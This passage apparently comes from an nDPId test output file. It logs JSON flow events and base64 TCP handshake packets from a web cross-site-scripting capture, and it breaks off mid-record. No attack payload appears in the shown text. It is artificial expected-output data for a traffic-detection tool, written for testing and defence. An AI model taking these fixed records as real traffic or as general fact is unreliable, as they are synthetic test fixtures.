+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":108,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347151520,"flow_last_seen":1499347156656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54148,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":109,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347152786,"flow_last_seen":1499347158656,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54162,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":110,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347155346,"flow_last_seen":1499347160658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54188,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2634,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347156630,"flow_last_seen":1499347161658,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347282696,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54202,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347285114,"flow_last_seen":1499347285114,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347285114,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55564,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2644,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":1499347285114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347285114,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8AAxAAD4GxcSsEAABwKgKMtkMAFDF1B3mAAAAAKACchCCyAAAAgQFtAQCCAoBOh3qAAAAAAEDAwc="} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2645,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":2,"flow_last_seen":1499347285114,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347285114,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Qzzh7fuxdQd56AScSDk7AAAAgQFtAQCCAoD4+9gATod6gEDAwc="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2646,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":3,"flow_last_seen":1499347285115,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347285115,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0AA1AAD4GxcusEAABwKgKMtkMAFDF1B3n84e374AQAOWD9AAAAQEICgE6HeoD4+9g"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347286403,"flow_last_seen":1499347286403,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347286403,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55578,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2655,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":1,"flow_last_seen":1499347286403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347286403,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8meVAAD4GK+usEAABwKgKMtkaAFAW6IbJAAAAAKACchDHgQAAAgQFtAQCCAoBOh8sAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2656,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":2,"flow_last_seen":1499347286403,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347286403,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Rp9ePmhFuiGyqAScSBcwAAAAgQFtAQCCAoD4\/CiATofLAEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2657,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":187,"flow_packet_id":3,"flow_last_seen":1499347286404,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347286404,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0meZAAD4GK\/KsEAABwKgKMtkaAFAW6IbKfXj5ooAQAOX7xwAAAQEICgE6HywD4\/Ci"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347287659,"flow_last_seen":1499347287659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347287659,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55592,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2667,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":1,"flow_last_seen":1499347287659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347287659,"pkt":"ABm5CmnxAMGxFOsxCABFAAA814FAAD4G7k6sEAABwKgKMtkoAFDVWPfnAAAAAKACchCWqgAAAgQFtAQCCAoBOiBmAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2668,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":2,"flow_last_seen":1499347287659,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347287659,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2Sh6EWHG1Vj36KAScSDF8QAAAgQFtAQCCAoD4\/HcATogZgEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2669,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":188,"flow_packet_id":3,"flow_last_seen":1499347287660,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347287660,"pkt":"ABm5CmnxAMGxFOsxCABFAAA014JAAD4G7lWsEAABwKgKMtkoAFDVWPfoehFhx4AQAOVk+QAAAQEICgE6IGYD4\/Hc"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347290163,"flow_last_seen":1499347290163,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347290163,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55618,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2685,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":1,"flow_last_seen":1499347290163,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347290163,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8D11AAD4GtnOsEAABwKgKMtlCAFDDfi2FAAAAAKACchBwWwAAAgQFtAQCCAoBOiLYAAAAAAEDAwc="} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2686,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":2,"flow_last_seen":1499347290164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347290164,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2ULBAUn+w34thqAScSBuCAAAAgQFtAQCCAoD4\/ROAToi2AEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2687,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":189,"flow_packet_id":3,"flow_last_seen":1499347290164,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347290164,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0D15AAD4GtnqsEAABwKgKMtlCAFDDfi2GwQFJ\/4AQAOUNEAAAAQEICgE6ItgD4\/RO"} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347291442,"flow_last_seen":1499347291442,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347291442,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2697,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":1,"flow_last_seen":1499347291442,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347291442,"pkt":"ABm5CmnxAMGxFOsxCABFAAA88hpAAD4G07WsEAABwKgKMtlQAFCuf9YCAAAAAKACchDbjgAAAgQFtAQCCAoBOiQYAAAAAAEDAwc="} +00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2698,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":2,"flow_last_seen":1499347291443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347291443,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2VCY8a8grn\/WA6AScSCa6QAAAgQFtAQCCAoD4\/WOATokGAEDAwc="} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2699,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_packet_id":3,"flow_last_seen":1499347291443,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347291443,"pkt":"ABm5CmnxAMGxFOsxCABFAAA08htAAD4G07ysEAABwKgKMtlQAFCuf9YDmPGvIYAQAOU58QAAAQEICgE6JBgD4\/WO"} 
+00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347292725,"flow_last_seen":1499347292725,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292725,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55646,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2712,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":1,"flow_last_seen":1499347292725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8Az5AAD4GwpKsEAABwKgKMtleAFDMWSZmAAAAAKACchBsAwAAAgQFtAQCCAoBOiVYAAAAAAEDAwc="} +00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2713,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":2,"flow_last_seen":1499347292725,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347292725,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2V6LTEh8zFkmZ6AScSCeZwAAAgQFtAQCCAoD4\/bOATolWAEDAwc="} 
+00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2714,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":191,"flow_packet_id":3,"flow_last_seen":1499347292726,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347292726,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0Az9AAD4GwpmsEAABwKgKMtleAFDMWSZni0xIfYAQAOU9bgAAAQEICgE6JVkD4\/bO"} +00812{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":78,"flow_state":"finished","flow_packets_processed":312,"flow_first_seen":1499347097460,"flow_last_seen":1499347166757,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1869,"flow_tot_l4_payload_len":232375,"flow_avg_l4_payload_len":744,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":53584,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347159323,"flow_last_seen":1499347164659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54228,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":113,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347160581,"flow_last_seen":1499347165659,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54242,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":115,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347164459,"flow_last_seen":1499347169660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54282,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00657{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} 
+00582{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":2718,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":116,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1499347165741,"flow_last_seen":1499347171660,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347292732,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":54296,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1499347295224,"flow_last_seen":1499347295224,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1499347295224,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55672,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2730,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":1,"flow_last_seen":1499347295224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA8CihAAD4Gu6isEAABwKgKMtl4AFDbgS3hAAAAAKACchBS1QAAAgQFtAQCCAoBOifJAAAAAAEDAwc="} 
+00488{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2731,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":2,"flow_last_seen":1499347295224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1499347295224,"pkt":"AMGxFOsxABm5CmnxCABFAAA8AABAAEAGw9DAqAoyrBAAAQBQ2XjDo5gx24Et4qAScSD6uwAAAgQFtAQCCAoD4\/k\/ATonyQEDAwc="} +00476{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2732,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":192,"flow_packet_id":3,"flow_last_seen":1499347295224,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1499347295224,"pkt":"ABm5CmnxAMGxFOsxCABFAAA0CilAAD4Gu6+sEAABwKgKMtl4AFDbgS3iw6OYMoAQAOWZwwAAAQEICgE6J8kD4\/k\/"} +01118{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2733,"source":"WebattackXSS.pcap","alias":"nDPId-test","flow_id":190,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1499347291442,"flow_last_seen":1499347295227,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":585,"flow_tot_l4_payload_len":585,"flow_avg_l4_payload_len":146,"midstream":0,"thread_ts_msec":1499347295227,"l3_proto":"ip4","src_ip":"172.16.0.1","dst_ip":"192.168.10.50","src_port":55632,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 
